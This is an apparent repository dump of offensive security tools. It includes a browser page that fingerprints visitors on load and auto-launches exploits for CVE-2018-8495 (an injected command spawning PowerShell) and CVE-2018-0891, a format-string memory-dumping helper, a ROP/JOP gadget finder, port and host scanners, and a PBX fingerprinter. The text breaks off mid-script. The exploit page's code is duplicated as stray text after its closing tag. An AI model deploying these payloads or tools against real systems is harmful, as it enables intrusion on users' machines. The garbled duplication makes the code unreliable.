├── Browser_FingerPwn.html
├── FWeScap.py
├── FormatStringTool.pl
├── ICMPHostDiscovery.tcl
├── Msfrop_Enhanced
├── PBX_FingerPrint.pl
├── Powershell_Without_Powershell.cs
├── README.md
├── RequestViewer.pl
├── SCP.pl
├── Securizer.pl
├── Shellc0deLoader.cs
├── Shellcode.csproj
├── ShellcodeExtractor.py
├── TFTP-Fuzzer.rb
├── binjitsuFS.py
├── poc_cve_2015_0235.c
├── wmic-poc.xsl
├── wp-xmlrpc-user-bf.pl
└── xmlrpc.pl


/Browser_FingerPwn.html:
--------------------------------------------------------------------------------
  1 | <meta http-equiv="Cache-Control" content="no-store" />
  2 | <head>
  3 | 	<script>
  4 | 
  5 | 	/*
  6 | 		Dirty Proof-of-concept (or skeleton) that could be used for browser targeting during assessments.
  7 | 		This is a personal source code, that's why this one is more a PoC/skeleton than a tool and use very dirty JS and PoC as payloads.
  8 | 		Sorry for purists but it make the job with few modifications so.....
  9 | 				
 10 | 		To be completed.... later maybe.
 11 | 		
 12 | 		kmkz
 13 | 	*/
 14 | 		
 15 | 		// UserAgent init
 16 | 		var useragent = navigator.userAgent;
 17 | 		
 18 | 		// OS
 19 | 		var win7 = /(Windows 7|Windows NT 6.1)/;
 20 | 		var win8 = /(Windows 8|Windows NT 6.2)/;
 21 | 		var win8_1 = /(Windows 8.1|Windows NT 6.3)/;
 22 | 		var win10 = /(Windows 10.0|Windows NT 10.0)/;
 23 | 		var linux = /(Linux x86)/;
 24 | 		var andro = /(Android)/;
 25 | 	
 26 | 		// Browser
 27 | 		var edge = /edge/i;
 28 | 
 29 | 		// Fingerprinting (to complete for browsers versions)
 30 | 		if  (win7.test(useragent)){
 31 | 			document.write("Win7 detected <br/>");
 32 | 			
 33 | 			//if  win7 + I.E 11:
 34 | 			cve_2018_0891();
 35 | 		}
 36 | 		else if (win8.test(useragent)){
 37 | 			document.write("Win8 detected <br/>");
 38 | 			document.write(useragent);
 39 | 		}
 40 | 		else if (win8_1.test(useragent)){
 41 | 			document.write("Win8.1 detected <br/>");
 42 | 			document.write(useragent);
 43 | 		}
 44 | 		else if (win10.test(useragent)){
 45 | 			document.write("Win10 detected <br/>");
 46 | 			document.write(useragent);
 47 | 			
 48 | 			if (edge.test(useragent)){
 49 | 				document.write("<br/>Edge detected <br/>Launching exploit ... <br/>");
 50 | 				cve_2018_8495();
 51 | 			}
 52 | 		}
 53 | 		else if (linux.test(useragent)){
 54 | 			document.write("Linux detected <br/>");
 55 | 			document.write(useragent);
 56 | 		}
 57 | 		else if (andro.test(useragent)){
 58 | 			document.write("Android detected <br/>");
 59 | 			document.write(useragent);
 60 | 		}
 61 | 		else{
 62 | 			document.write("Unable to fingerprint browser version <br/> No exploit for you  :-* <br/>");
 63 | 		}
 64 | 			
 65 | // Payloads (todo)
 66 | function cve_2018_8495(){
 67 | 	document.body.innerHTML ='<a id="q" href=\'wshfile:test/../../System32/SyncAppvPublishingServer.vbs" test test;wmic process call create powershell;"\'>Exploit !</a>';
 68 | 	return 0;
 69 | }
 70 | 
 71 | function cve_2018_0891(){
 72 | 
 73 | 	// PoC only
 74 | 	function main() {
 75 | 		RegExp.input = {toString: f};
 76 | 		alert(RegExp.lastMatch);
 77 | 	}
 78 | 
 79 | 	var input = [Array(10000000).join("a"), Array(11).join("b"), Array(100).join("a")].join("");
 80 | 
 81 | 	function f() {
 82 | 		String.prototype.match.call(input, "bbbbbbbbbb");
 83 | 	}
 84 | 	main();
 85 | }				
 86 | 	</script>
 87 | </head>
 88 | </body>
 89 | 
 90 | 		// Browser
 91 | 		var edge = /edge/i;
 92 | 
 93 | 		// Fingerprinting (to complete for browsers versions)
 94 | 		if  (win7.test(useragent)){
 95 | 			document.write("Win7 detected <br/>");
 96 | 			
 97 | 			//if  win7 + I.E 11:
 98 | 			cve_2018_0891();
 99 | 		}
100 | 		else if (win8.test(useragent)){
101 | 			document.write("Win8 detected <br/>");
102 | 			document.write(useragent);
103 | 		}
104 | 		else if (win8_1.test(useragent)){
105 | 			document.write("Win8.1 detected <br/>");
106 | 			document.write(useragent);
107 | 		}
108 | 		else if (win10.test(useragent)){
109 | 			document.write("Win10 detected <br/>");
110 | 			document.write(useragent);
111 | 			
112 | 			if (edge.test(useragent)){
113 | 				document.write("<br/>Edge detected <br/>Launching exploit ... <br/>");
114 | 				cve_2018_8495();
115 | 			}
116 | 		}else{
117 | 			document.write("Unable to fingerprint browser version <br/> No exploit for you  :-* <br/>");
118 | 		}
119 | 			
120 | // Payloads (todo)
121 | function cve_2018_8495(){
122 | 	document.body.innerHTML ='<a id="q" href=\'wshfile:test/../../System32/SyncAppvPublishingServer.vbs" test test;wmic process call create powershell;"\'>Exploit !</a>';
123 | 	return 0;
124 | }
125 | 
126 | function cve_2018_0891(){
127 | 
128 | 	// PoC only
129 | 	function main() {
130 | 		RegExp.input = {toString: f};
131 | 		alert(RegExp.lastMatch);
132 | 	}
133 | 
134 | 	var input = [Array(10000000).join("a"), Array(11).join("b"), Array(100).join("a")].join("");
135 | 
136 | 	function f() {
137 | 		String.prototype.match.call(input, "bbbbbbbbbb");
138 | 	}
139 | 	main();
140 | }				
141 | 	</script>
142 | </head>
143 | </body>
144 | 


--------------------------------------------------------------------------------
/FWeScap.py:
--------------------------------------------------------------------------------
  1 | #! /usr/bin/env python
  2 | 
  3 | import sys, getopt
  4 | 
  5 | # Set log level to benefit from Scapy warnings
  6 | import logging
  7 | logging.getLogger("scapy").setLevel(1)
  8 | 
  9 | from scapy.all import *
 10 | 
 11 | 
 12 | 	
 13 | def Usage():
 14 | 	print("[-] Missing argument !")
 15 | 	
 16 | 	
 17 | def Tcp(proto, targ):
 18 | 	print "[+]Sending tcp!", proto, "request on", targ
 19 | 	
 20 | 	start= 20
 21 | 	end  = 50
 22 | 	for dport in range(start, end):
 23 | 		
 24 | 		# Generate random source port number
 25 | 		sport=RandNum(1024,65535)
 26 | 		
 27 | 		print "Tryning request on port number== ", dport
 28 | 		res, unans = sr(IP(dst=targ)/TCP(sport=sport,dport=dport,flags="S"),inter=0.5,retry=-2,timeout=1)
 29 | 		#~ ans,unans
 30 | 		res.summary()
 31 | 		#sending.show()
 32 | 		#~ if Req:
 33 | 			
 34 | 			#~ print Req.dport, Req.seq
 35 | 			 #~ ans,unans
 36 | 			#~ ans.summary()
 37 | 			
 38 | 
 39 | 			
 40 | 
 41 | 
 42 | def Udp(proto, targ):
 43 | 	print "woot udp!", proto
 44 | 
 45 | 
 46 | def Arp(proto, targ):
 47 | 	print "woot arp!"
 48 | 	
 49 | 	
 50 | def Icmp(proto, targ):
 51 | 	print "[+]Sending", proto, "request on ", targ
 52 | 
 53 | 		
 54 | 	# Basic ICMP request:
 55 | 	ping=sr1(IP(dst=targ)/ICMP())
 56 | 	if ping:
 57 | 		ping.show()
 58 | 	
 59 | 	
 60 | 	
 61 | 	
 62 | 
 63 | def main(argv):
 64 | 	
 65 | 	# Default values:
 66 | 	target= "127.0.0.1"
 67 | 	protocol= "icmp"
 68 | 	
 69 | 	try:
 70 | 		opts, args = getopt.getopt(argv, "ht:p:", ["help", "target=", "protocol="])
 71 | 		
 72 | 	except getopt.GetoptError:
 73 | 		Usage()
 74 | 		sys.exit(2)
 75 | 		
 76 | 	for opt, arg in opts:
 77 | 		
 78 | 		# Usage/help called:
 79 | 		if opt in ('-h', '--help'):
 80 | 			print"help"
 81 | 			Usage()
 82 | 			sys.exit()
 83 | 		
 84 | 		
 85 | 		elif opt in ('-t', '--target'):
 86 | 			target=arg
 87 | 			
 88 | 		elif opt in ('-p', '--protocol'):
 89 | 			protocol = arg
 90 | 			
 91 | 	# Switch/case:
 92 | 	if protocol == "tcp":
 93 | 		Tcp(protocol, target)
 94 | 	elif protocol == "icmp":
 95 | 		Icmp(protocol, target)
 96 | 	elif protocol == "udp":
 97 | 		Udp(protocol, target)
 98 | 	elif protocol == "arp":
 99 | 		Arp(protocol, target)
100 | 		
101 | 	else:
102 | 		assert False, "unknow or invalid options"
103 | 		
104 | 			
105 | 
106 | 		
107 | 
108 | if __name__ == "__main__":
109 | 	main(sys.argv[1:])
110 | 
111 | 
112 | 
113 | 	
114 | 	
115 | 	


--------------------------------------------------------------------------------
/FormatStringTool.pl:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/perl -wU
  2 | 
  3 | # Modules:
  4 | use strict;
  5 | use Pod::Usage;
  6 | use Getopt::Long;
  7 | use Switch 'Perl6';
  8 | use Term::ANSIColor;
  9 | 
 10 | # Features:
 11 | use feature 'say';
 12 | use feature 'switch';
 13 | 
 14 | # Constants:
 15 | use constant MAX_LONG => 900;
 16 | use constant TRUE     => 1;
 17 | use constant FALSE    => 0;
 18 | 
 19 | 
 20 | # No stack cookies (not required):  gcc  -fno-stack-protector -o bin1 bin1.c
 21 | # No ASLR (not required):   echo 0 > /proc/sys/kernel/randomize_va_space
 22 | #
 23 | # Usage:
 24 | # ./FS_Offset_discovery.pl --verbose=1 --pattern=44434241 -b=bin1 --junk=ABCD
 25 | # 
 26 | # Flag example= 61-74617461-6c707968
 27 | 
 28 | 
 29 | 
 30 | 
 31 | my $result = GetOptions(
 32 | 			'binary|b=s'  => \my $BinName,
 33 | 			'verbose|v=i' => \my $Verbose, 
 34 | 			'pattern|p=s' => \my $Pattern,
 35 | 			'junk|j=s'    => \my $Junk,
 36 | 			);
 37 | 			
 38 | pod2usage(1) if(not defined($BinName && $Verbose));
 39 | 
 40 | $Pattern="41414141" if(not defined($Pattern));
 41 | $Junk="AAAAAA"      if(not defined($Junk));
 42 | 
 43 | my $GetOffset="%x";
 44 | my $Base;
 45 | 
 46 | # Check ASLR status: 
 47 | my $GetASLR = IO::File->new("/proc/sys/kernel/randomize_va_space", "r");
 48 | my $ASLRState = <$GetASLR> if(defined($GetASLR));
 49 | $GetASLR->close;
 50 | print colored("\n[*] Checking ASLR security ...",'green');
 51 | 
 52 | SWITCH:
 53 | given ($ASLRState) {
 54 | 	when(0){       say colored(" No ASLR detected: have fun!",'bold green');}
 55 | 	when(/1|2|3/){ say colored(" ASLR detected !",'bold yellow');}
 56 | 	default{       say colored(" ASLR parameter: Not Found!",'bold red');}
 57 | }
 58 | 
 59 | MAIN_CODE:
 60 | if ($Verbose eq TRUE){
 61 | 
 62 | 	for($Base=0;$Base <= MAX_LONG; $Base++){
 63 | 		my $Exec=qx{./$BinName $Junk$GetOffset};
 64 | 		say colored("-Trying with $Base format arguments... $BinName $Junk$GetOffset",'blue');
 65 | 
 66 | 		say("- Current offsets: $Exec\n");
 67 | 		
 68 | 		last if($Exec =~ /$Pattern/gi);
 69 | 		say colored("[-] No match found",'red');
 70 | 		$GetOffset .= "%x-";
 71 | 	}
 72 | 	exit(FALSE) if($Base eq MAX_LONG);
 73 | 
 74 | 	PATTERN_FOUND:
 75 | 		PatternOk();
 76 | 		OffsetExplore();
 77 | 		BruteForceStack();
 78 | 		SimpleHexAsciiConvertion();
 79 | 
 80 | }
 81 | elsif($Verbose eq FALSE ){
 82 | 	
 83 | 	for($Base=0;$Base <= MAX_LONG; $Base++){
 84 | 		my $Exec=qx{./$BinName $Junk$GetOffset};
 85 | 		last if($Exec =~ /$Pattern/gi);
 86 | 		$GetOffset .= "%x-";
 87 | 	}
 88 | 	if($Base eq MAX_LONG){
 89 | 		say colored("[-] No match found",'red');
 90 | 		exit(FALSE);
 91 | 	}
 92 | 
 93 | 	PATTERN_FOUND:
 94 | 		PatternOk();
 95 | 		OffsetExplore();
 96 | 		BruteForceStack();
 97 | 		SimpleHexAsciiConvertion();
 98 | 	
 99 | 
100 | }
101 | 
102 | 
103 | 
104 | 		#########################################
105 | 		#		Functions		#
106 | 		#########################################
107 | 
108 | 
109 | 
110 | sub SimpleHexAsciiConvertion{
111 | 	
112 | 	say("Do You want to convert hex data to ascii ? [Y|N]");
113 | 	my $Convert=<stdin>;
114 | 	chomp($Convert);
115 | 
116 | 	if($Convert =~ /y/i){
117 | 
118 | 		print colored("[+] Please enter pseudo offset or other hex value to convert (offset is the index value, see help for more informations): \n Hex: ",'blue');
119 | 		my $ToConvert=<stdin>;
120 | 		chomp($ToConvert);
121 | 		$ToConvert=~ s/[-]//g;
122 | 		die colored("What are ou trying to do ?? \n",'red') if(!($ToConvert));
123 | 		
124 | 		my $ConvertToAscii= pack "H*", "$ToConvert";
125 | 		$ConvertToAscii=reverse($ConvertToAscii);
126 | 		say colored ("- Converted data in ASCII (Little Endian's value must be reversed, see help for more informations): $ConvertToAscii\n",'yellow');
127 | 	}
128 | }
129 | 
130 | 	
131 | sub BruteForceStack{
132 | 	
133 | 	say("Do You want to read stack value by bruteforce method ? [Y|N]");
134 | 	my $Bf=<stdin>;
135 | 	chomp($Bf);
136 | 
137 | 	if($Bf =~ /y/i){
138 | 		for(my $Limit=0;$Limit <= 280;$Limit++){
139 | 			my $Dumping =qx{./$BinName $Junk%$Limit\\\$s};
140 | 			next if(not($Dumping) || $Dumping =~ /fault/);
141 | 			print colored("- Current value (limite: $Base) = ",'blue');
142 | 			say $Dumping;
143 | 		}
144 | 	}
145 | }
146 | 
147 | sub OffsetExplore{
148 | 	
149 | 	say("Do You want to dump an offset data ? [Y|N]");
150 | 	my $ReadOffset=<stdin>;
151 | 	chomp($ReadOffset);
152 | 	
153 | 	say("Do You want to collect Offsets (very verbose!) ? [Y|N]");
154 | 	my $CollectOffset=<stdin>;
155 | 	chomp($CollectOffset);
156 | 	
157 | 	if($CollectOffset =~ /y/i){
158 | 		my $Collect=qx{./$BinName $Junk$GetOffset};
159 | 		
160 | 		die if(($Collect !~ /bf|08/) || (not($Collect))); 
161 | 		$Collect =~ s/-/ [OFFSETs] with index: $Base\n/g;
162 | 		say($Collect);
163 | 	}
164 | 
165 | 	if($ReadOffset =~ /y/i){
166 | 		
167 | 		print colored("[+] Please enter offset to read (offset is the index value, see help for more informations): ",'blue');
168 | 		my $Offset=<stdin>;
169 | 		chomp($Offset);
170 | 		die colored("What are ou trying to do ?? \n",'red') if(!($Offset));
171 | 		my $DumpOffset =qx{./$BinName $Junk%$Offset\\\$s};
172 | 		say ("- Collected data (ascii): $DumpOffset\n");
173 | 	}
174 | }
175 | 
176 | sub PatternOk{
177 | 	
178 | 	print colored("\n[+] Pattern found with $Base format arguments: \n    Payload used:\n",'green');
179 | 	my $NewBase=$Base-1;
180 | 	say ("$Junk$GetOffset\n");
181 | 	print colored("[+] Shortcut to get custom stack value: ./$BinName",'green');
182 | 	say colored(" $Junk"."AA"."%$NewBase\\\$"."x \n",'bold green');	
183 | }
184 | 	
185 | 	
186 | 	
187 | =info
188 | 
189 | 
190 | [1] Description:
191 | 
192 | Tool developped for Format Strings (local) automation.
193 | This Version permit you to collect a lot of infomations and to dump a lot of 
194 | memory data bypassing ASLR (if any).
195 | 
196 | 
197 | [2] Possibilities / Functions:
198 | 
199 | 	- Check ASLR state
200 | 	- Build a payload start (with padding)
201 | 	- Collect all offsets in stack once index was found 
202 | 	- Dump an offset data (in ASCII)
203 | 	- Print all stack value (in ASCII) by bruteforce method
204 | 	- Convert hex data in ascii (for offset wich are data ;) )
205 | 	
206 | [3] Parameters / Oprions:
207 | 
208 | This tool require parameters and uses some optional.
209 | 
210 | 	- Required:
211 | 		
212 | 		- verbose (v) : booleans values 1 or 0 
213 | 		- binary  (b) : vulerable binary name
214 | 
215 | 	- Optional:
216 | 		
217 | 		- junk    (j) : junk data like "AAAAA" used for adjustment (padding)
218 | 		- pattern (p) : pattern to match (like 41414141)
219 | 		
220 | 	- Default values:
221 | 		
222 | 		1) junk default    = AAAAAA
223 | 		2) pattern default = 41414141
224 | 		
225 | [4] Example:
226 | 
227 | ./FS_ExploitTool.pl --verbose=1 --pattern=414141 -b=bin2 --junk=AAAAAA
228 | 
229 | [5] FS_ExploitTool todo list:	
230 | 
231 | 	- Build a full payload
232 | 	- Have choice between many possible payloads
233 | 	- Make it possible to exploit easily 
234 | 
235 | [6] Contact (to whip me \o/):
236 | 	
237 | 	-Emails:
238 | 		kmkz[at]tuxfamily[dot]org (for fun)
239 | 		mail[dot]bourbon[at]gmail[dot]com
240 | 	
241 | 	-Tweeter: kmkz_security
242 | 	-linkedin:
243 | 		[FR] linkedin.com/pub/jean-marie-bourbon/56/928/469
244 | 		[EN] linkedin.com/pub/jean-marie-bourbon/56/928/469/en
245 | 	-IRC nickname: kmkz
246 | 	
247 | 
248 | =cut
249 | 
250 | 
251 | __END__
252 | 


--------------------------------------------------------------------------------
/ICMPHostDiscovery.tcl:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/tclsh
 2 | 
 3 | 
 4 | 
 5 | 
 6 | #kmkz@kali:~/Desktop# ./testIP.tcl 
 7 | #--| Please give-me the IP range to test (example: 192.168.1) |-- 
 8 | #192.168.1
 9 | #* Discovering hosts for 192.168.1.*
10 | #192.168.1.1
11 | #192.168.1.2
12 | #192.168.1.3
13 | #192.168.1.4
14 | #192.168.1.5
15 | #192.168.1.6
16 | 
17 | 
18 | 
19 | puts -nonewline "--| Please give-me the IP range to test (example: 192.168.1) |-- \n"
20 | flush stdout
21 | set iprange [gets stdin]
22 | 
23 | puts "* Discovering hosts for $iprange.*\n"
24 | 
25 | for { set i 1 } { $i < 254 } { incr i } {
26 | 	puts "trying $iprange.$i"
27 | 	
28 | 	# Ios version:
29 | 	#if { 
30 | 		#[regexp "(!!!)" [exec "ping $iprange.$i timeout 1" ]]
31 | 	#}	{
32 | 
33 |         # Linux version:
34 | 	if {
35 | 		[regexp "(=)" [exec  "ping $iprange.$i" ]]
36 | 	}	{
37 | 			puts "$iprange.$i : up!"
38 | 		}
39 | 		else{
40 | 			puts "$iprange.$i : down!"
41 | 		}
42 | 	}
43 |         # exec ping  "$iprange.$i timeout 1"
44 |        #eval $command
45 | }
46 | 


--------------------------------------------------------------------------------
/Msfrop_Enhanced:
--------------------------------------------------------------------------------
  1 | #!/opt/metasploit/ruby/bin/framework-ruby
  2 | # -*- coding: binary -*-
  3 | #
  4 | # $Id$
  5 | #
  6 | # This tool will collect, export, and import ROP and JOP gadgets
  7 | # from various file formats (PE, ELF, Macho)
  8 | # $Revision$
  9 | #
 10 | # Jop Gadgets support by Bourbon Jean-marie (kmkz):
 11 | # 	[1.0] Added JoP gadget research  (July 2014)
 12 | # 	[1.1] Jump Far (jmpf) support, Initializer gadget research, call gadgets optimisations (November 2014)
 13 | #	[1.2] Basic dispatcher (add + jmp) gadget research and optimisations (August 2015)
 14 | 
 15 | 
 16 | msfbase = __FILE__
 17 | while File.symlink?(msfbase)
 18 | 	msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
 19 | end
 20 | 
 21 | $:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib')))
 22 | require 'msfenv'
 23 | 
 24 | $:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
 25 | 
 26 | require 'rex'
 27 | require 'rex/ropbuilder'
 28 | require 'rex/ui/text/output/stdio'
 29 | require 'rex/ui/text/color'
 30 | require 'optparse'
 31 | 
 32 | def opt2i(o)
 33 | 	o.index("0x")==0 ? o.hex : o.to_i
 34 | end
 35 | 
 36 | opts = {}
 37 | color = true
 38 | 
 39 | # Set options:
 40 | opt = OptionParser.new
 41 | opt.banner = "\n
 42 | 		***************************************************
 43 | 		*        [MSFROP enhanced version v1.1]           *
 44 | 		* Jop Gadgets support by Bourbon Jean-marie (kmkz)*
 45 | 		*   For more info please refer to msfrop headers  *
 46 | 		***************************************************\n
 47 |     [+] Usage #{$PROGRAM_NAME} <option> [targets]\n\n
 48 | "
 49 | opt.separator('')
 50 | opt.separator('Options:')
 51 | 
 52 | opt.on('-d', '--depth [size]', 'Number of maximum bytes to backwards disassemble from return instructions') do |d|
 53 | 	opts[:depth] = opt2i(d)
 54 | end
 55 | 
 56 | opt.on('-s', '--search [regex]', 'Search for gadgets matching a regex, match intel syntax or raw bytes') do |regex|
 57 | 	opts[:pattern] = regex
 58 | end
 59 | 
 60 | opt.on('-j', '--jop', 'Search for jump oriented gadgets (intel syntax)') do 
 61 | 	opts[:jop] = true
 62 | end
 63 | 
 64 | opt.on('-I', '--init', 'Search for initializer gadget (intel syntax)') do 
 65 | 	opts[:init] = true
 66 | end
 67 | 
 68 | opt.on('-D', '--dispatch', 'Search for basic dispatcher gadget (intel syntax)') do 
 69 | 	opts[:dispatch] = true
 70 | end
 71 | 
 72 | opt.on('-n', '--nocolor', 'Disable color. Useful for piping to other tools like the less and more commands') do
 73 | 	color = false
 74 | end
 75 | 
 76 | opt.on('-x', '--export [filename]', 'Export gadgets to CSV format') do |csv|
 77 | 	opts[:export] = csv
 78 | end
 79 | 
 80 | opt.on('-i', '--import [filename]', 'Import gadgets from previous collections') do |csv|
 81 | 	opts[:import] = csv
 82 | end
 83 | 
 84 | opt.on('-v', '--verbose', 'Output very verbosely') do
 85 | 	opts[:verbose] = true
 86 | end
 87 | 
 88 | opt.on_tail('-h', '--help', 'Show this message') do
 89 | 	puts opt
 90 | 	exit(1)
 91 | end
 92 | 
 93 | begin
 94 | 	opt.parse!
 95 | rescue OptionParser::InvalidOption
 96 | 	puts "Invalid option, try -h for usage\n"
 97 | 	exit(1)
 98 | end
 99 | 
100 | if opts.empty? and (ARGV.empty? or ARGV.nil?)
101 | 	puts "no options"
102 | 	puts opt
103 | 	exit(1)
104 | end
105 | 
106 | # Set defaults as a non verbose ROP gadgets research:
107 | opts[:depth] ||= 8
108 | gadgets = []
109 | 
110 | if opts[:import].nil?
111 | 	files = []
112 | 	ARGV.each do |file|
113 | 		
114 | 	if(File.directory?(file))
115 | 		dir = Dir.open(file)
116 | 		dir.entries.each do |ent|
117 | 			path = File.join(file, ent)
118 | 			next if not File.file?(path)
119 | 			files << File.join(path)
120 | 	end
121 | 	else
122 | 		files << file
123 | 	end
124 | end
125 |   
126 | ropbuilder = Rex::RopBuilder::RopCollect.new
127 | 
128 | # Main loop:
129 | files.each do |file|
130 | 	    
131 | 	# Jump Oriented Support:
132 | 	if opts[:jop]
133 | 		jmp, jmpf, call = []
134 | 		ropbuilder = Rex::RopBuilder::RopCollect.new(file)
135 | 		ropbuilder.print_msg("Collecting Jump Oriented gadgets from %bld%cya#{file}%clr\n", color)
136 | 		
137 | 		# Here you can add new JoP gadgets here:
138 | 		jmp   = ropbuilder.collect(opts[:depth], "\xeb") # \xeb= jmp
139 | 		jmpf  = ropbuilder.collect(opts[:depth], "\xea") # \xea= jmp far 
140 | 		call   = ropbuilder.collect(opts[:depth], "\xe8") # \xe8= call (\xff not so fun..)
141 | 		
142 | 		ropbuilder.print_msg("Found %grn#{jmp.count + jmpf.count + call.count}%clr Jump Oriented gadgets\n\n", color)
143 | 		
144 | 	elsif opts[:init]
145 | 		popa = []
146 | 		ropbuilder = Rex::RopBuilder::RopCollect.new(file)
147 | 		ropbuilder.print_msg("Collecting Initializer gadget from %bld%cya#{file}%clr\n", color)
148 | 		
149 | 		popa   = ropbuilder.collect(opts[:depth], "\x61") # \x61= popa(d)
150 | 	
151 | 		ropbuilder.print_msg("Found %grn#{popa.count}%clr Jump Oriented gadgets\n\n", color)
152 | 		
153 | 	elsif opts[:dispatch]
154 | 		addjmp = []
155 | 		ropbuilder = Rex::RopBuilder::RopCollect.new(file)
156 | 		ropbuilder.print_msg("Collecting basic Dispatcher gadget from %bld%cya#{file}%clr\n", color)
157 | 		
158 | 		addjmp   = ropbuilder.collect(opts[:depth], "\xeb\x05") # \xeb= jmp +  \x05= add eax,value   (little endian)
159 | 	
160 | 		ropbuilder.print_msg("Found %grn#{addjmp.count}%clr Jump Oriented gadgets\n\n", color)
161 | 		
162 | 	else
163 | 		# Return Oriented:
164 | 		ret, retn = []
165 | 		ropbuilder = Rex::RopBuilder::RopCollect.new(file)
166 | 		ropbuilder.print_msg("Collecting Return Oriented gadgets from %bld%cya#{file}%clr\n", color)
167 | 		retn = ropbuilder.collect(opts[:depth], "\xc2")  # \xc2 retn
168 | 		ret  = ropbuilder.collect(opts[:depth], "\xc3")   # \xc3 ret
169 | 		ropbuilder.print_msg("Found %grn#{ret.count + retn.count}%clr Return Oriented gadgets\n\n", color)
170 | 	end
171 | 	
172 | 				#######################################
173 | 				#	Compile a list of all ROP & JOP gadgets from all files     #
174 | 				#######################################
175 | 	
176 | 				
177 | 	# Jop gadgets option:
178 | 	if opts[:jop]
179 | 		
180 | 		# Direct JMP loop:
181 | 		jmp.each do |gadget|
182 | 			gadgets << gadget
183 | 			
184 | 			if opts[:verbose]
185 | 				ropbuilder.print_msg("#{gadget[:file]} direct jump gadget: %bld%grn#{gadget[:address]}%clr\n", color)
186 | 				ropbuilder.print_msg("#{gadget[:disasm]}\n", color)
187 | 			end
188 | 			
189 | 			 #  CALL  loop:
190 | 			call.each do |gadget|
191 | 				gadgets << gadget
192 | 			
193 | 				if opts[:verbose]
194 | 					ropbuilder.print_msg("#{gadget[:file]} call gadget: %bld%grn#{gadget[:address]}%clr\n", color)
195 | 					ropbuilder.print_msg("#{gadget[:disasm]}\n", color)
196 | 				end		
197 | 		
198 | 			       #  JMP FAR  loop:
199 | 				jmpf.each do |gadget|
200 | 					gadgets << gadget
201 | 				
202 | 					if opts[:verbose]
203 | 						ropbuilder.print_msg("#{gadget[:file]} jump far gadget: %bld%grn#{gadget[:address]}%clr\n", color)
204 | 						ropbuilder.print_msg("#{gadget[:disasm]}\n", color)
205 | 					end
206 | 				end
207 | 			end
208 | 		end
209 | 	elsif opts[:init]
210 | 		
211 | 		# Initializer loop:
212 | 		popa.each do |gadget|
213 | 			gadgets << gadget
214 | 			
215 | 			if opts[:verbose]
216 | 				ropbuilder.print_msg("#{gadget[:file]} initializer gadget: %bld%grn#{gadget[:address]}%clr\n", color)
217 | 				ropbuilder.print_msg("#{gadget[:disasm]}\n", color)
218 | 			end
219 | 		end
220 | 	elsif opts[:dispatch]
221 | 		
222 | 		# Dispatcher loop:
223 | 		addjmp.each do |gadget|
224 | 			gadgets << gadget
225 | 			
226 | 			if opts[:verbose]
227 | 				ropbuilder.print_msg("#{gadget[:file]} basic dispatcher gadget: %bld%grn#{gadget[:address]}%clr\n", color)
228 | 				ropbuilder.print_msg("#{gadget[:disasm]}\n", color)
229 | 			end
230 | 		end
231 | 	###########
232 | 	#  Rop gadgets #
233 | 	###########
234 | 	else
235 | 		ret.each do |gadget|
236 | 			gadgets << gadget
237 | 			if opts[:verbose]
238 | 				ropbuilder.print_msg("#{gadget[:file]} rop gadget: %bld%grn#{gadget[:address]}%clr\n", color)
239 | 				ropbuilder.print_msg("#{gadget[:disasm]}\n", color)
240 | 			end
241 | 		end
242 | 	end
243 | 	
244 | 	ropbuilder.print_msg("Found %bld%grn#{gadgets.count}%clr gadgets total\n\n", color)
245 | end
246 | 
247 | 
248 | # Import from file:
249 | if opts[:import]
250 | 
251 | 	ropbuilder = Rex::RopBuilder::RopCollect.new()
252 | 	ropbuilder.print_msg("Importing gadgets from %bld%cya#{opts[:import]}\n", color)
253 | 	gadgets = ropbuilder.import(opts[:import])
254 | 
255 | 	gadgets.each do |gadget|
256 | 		ropbuilder.print_msg("gadget: %bld%cya#{gadget[:address]}%clr\n", color)
257 | 		ropbuilder.print_msg(gadget[:disasm] + "\n", color)
258 | 	end
259 | 
260 | 	ropbuilder.print_msg("Imported %grn#{gadgets.count}%clr gadgets\n", color)
261 | end
262 | 
263 | # Search by pattern matching:
264 | if opts[:pattern]
265 | 	matches = ropbuilder.pattern_search(opts[:pattern])
266 | 	if opts[:verbose]
267 | 		ropbuilder.print_msg("Found %grn#{matches.count}%clr matches\n", color)
268 | 	end
269 | end
270 | 
271 | # Export gadgets in CSV file:
272 | if opts[:export]
273 | 	ropbuilder.print_msg("Exporting %grn#{gadgets.count}%clr gadgets to %bld%cya#{opts[:export]}%clr\n", color)
274 | 	csv = ropbuilder.to_csv(gadgets)
275 | 
276 | 		if csv.nil?
277 | 			exit(1)
278 | 		end
279 | 
280 | 		begin
281 | 			fd = File.new(opts[:export], 'w')
282 | 			fd.puts csv
283 | 			fd.close
284 | 		rescue
285 | 			puts "Error writing #{opts[:export]} file"
286 | 			exit(1)
287 | 		end
288 | 		ropbuilder.print_msg("%bld%redSuccess!%clr gadgets exported to %bld%cya#{opts[:export]}%clr\n", color)
289 | 	end
290 | end
291 | 
292 | 
293 | 


--------------------------------------------------------------------------------
/PBX_FingerPrint.pl:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/perl -wU
 2 | 
 3 | =info
 4 | 
 5 | Checks for Alcatel 4400, sending TCP data on port 2533 / looking for specific reply to perform fingerprinting
 6 |  
 7 | Original paper : http://seclists.org/pen-test/2006/Jun/355
 8 | 
 9 | Exemple:
10 | 	[shell]#perl PBX_FingerPrint.pl -s 192.168.1.110
11 | 	[+] ALCATEL 4400 checker.
12 | 
13 | 	192.168.1.110 seems to be an Alcatel 4400 PBX
14 | 
15 | =cut
16 | 
17 | use 5.010;
18 | use Getopt::Std;
19 | use IO::Socket::INET;
20 | 
21 | 
22 | 
23 | say"[+] ALCATEL 4400 checker.\n";
24 | 
25 | getopts('s:', \%args);
26 | 
27 | if(not(defined($args{s}))){
28 | 	usage();
29 | }
30 | 
31 | my $data = "\x43";
32 | my $size = "\x00\x01";
33 | 
34 | my $serv = $args{s};
35 | my $port = 2533;
36 | my $buf = $size . $data;
37 | 
38 | if($socket = new IO::Socket::INET(PeerAddr => $serv, PeerPort => $port, Proto => "tcp", Timeout => 1)){
39 | 
40 | 	print $socket $buf;
41 | 	read($socket,$chunk,2);
42 | 
43 | 
44 | 	if($chunk & "\x00\x01"){
45 | 		say "[+]$serv seems to be an Alcatel 4400 PBX \n";
46 | 	}else{
47 | 		say "[-]$serv doesn't look like an Alcatel 4400 PBX \n";
